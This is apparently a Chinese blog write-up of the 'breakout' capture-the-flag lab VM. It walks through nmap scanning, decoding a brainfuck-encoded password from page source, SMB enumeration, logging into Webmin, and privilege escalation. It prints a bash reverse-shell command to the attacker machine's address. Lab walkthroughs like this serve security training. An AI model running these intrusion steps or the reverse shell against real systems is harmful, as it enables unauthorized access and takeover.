breakout

虚拟机配置

将靶机和攻击机放在同一网段下即可

web渗透

扫描ip
nmap -sP 192.168.11.0/24
image
详细扫描
nmap -A 192.168.11.102 -p 0-65535
image
探测80端口
image
右键查看源码,得到一个brainfuck编码
image
解码得到.2uqPEfj3D<P'a-3猜测可能为某用户的密码

139,445端口探测smb服务,搜集smb信息
enum4linux 192.168.11.102
探测到cyber用户
继续探测10000,20000端口为两个登录页面
image

image
在webmin处登录
cyber:.2uqPEfj3D<P'a-3
image
登录成功
发现一命令行终端
image
image

提权

发现一密码的压缩包
image
解压,查看内容
image
image
发现一密码,猜测为root密码
image
命令被ban了,反弹shell
bash -i >&/dev/tcp/192.168.11.146/4444 0>&1
image
image
提权成功
得到flagimage

posted @   vзn0m  阅读(7)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
点击右上角即可分享
微信分享提示